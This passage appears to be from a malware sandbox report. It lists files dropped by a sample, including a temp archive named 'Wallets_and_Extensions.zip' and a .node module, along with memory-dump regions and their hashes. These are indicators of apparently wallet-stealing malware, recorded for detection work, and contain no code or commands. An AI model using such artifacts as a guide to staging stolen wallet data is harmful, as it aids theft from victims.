                                                                                                      60B

                                                                                                      MD5

                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                      SHA1

                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                      SHA256

                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                      SHA512

                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\akaTiYCogZkKm0CNb\Wallets_and_Extensions.zip

                                                                                                      Filesize

                                                                                                      22B

                                                                                                      MD5

                                                                                                      76cdb2bad9582d23c1f6f4d868218d6c

                                                                                                      SHA1

                                                                                                      b04f3ee8f5e43fa3b162981b50bb72fe1acabb33

                                                                                                      SHA256

                                                                                                      8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85

                                                                                                      SHA512

                                                                                                      5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

                                                                                                    • C:\Users\Admin\AppData\Local\Temp\ef491dc5-9fe8-4db9-a1bf-8ff8b59e8cb5.tmp.node

                                                                                                      Filesize

                                                                                                      1.8MB

                                                                                                      MD5

                                                                                                      3072b68e3c226aff39e6782d025f25a8

                                                                                                      SHA1

                                                                                                      cf559196d74fa490ac8ce192db222c9f5c5a006a

                                                                                                      SHA256

                                                                                                      7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01

                                                                                                      SHA512

                                                                                                      61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61

                                                                                                    • memory/1572-20-0x000001EB20A60000-0x000001EB20AB0000-memory.dmp

                                                                                                      Filesize

                                                                                                      320KB

                                                                                                    • memory/1572-10-0x000001EB20530000-0x000001EB20552000-memory.dmp

                                                                                                      Filesize

                                                                                                      136KB

                                                                                                    • memory/2692-70-0x000001951B5A0000-0x000001951B5E4000-memory.dmp

                                                                                                      Filesize

                                                                                                      272KB

                                                                                                    • memory/2692-71-0x000001951B670000-0x000001951B6E6000-memory.dmp

                                                                                                      Filesize

                                                                                                      472KB

                                                                                                    • memory/2692-75-0x000001951B5F0000-0x000001951B614000-memory.dmp

                                                                                                      Filesize

                                                                                                      144KB

                                                                                                    • memory/2692-74-0x000001951B5F0000-0x000001951B61A000-memory.dmp

                                                                                                      Filesize

                                                                                                      168KB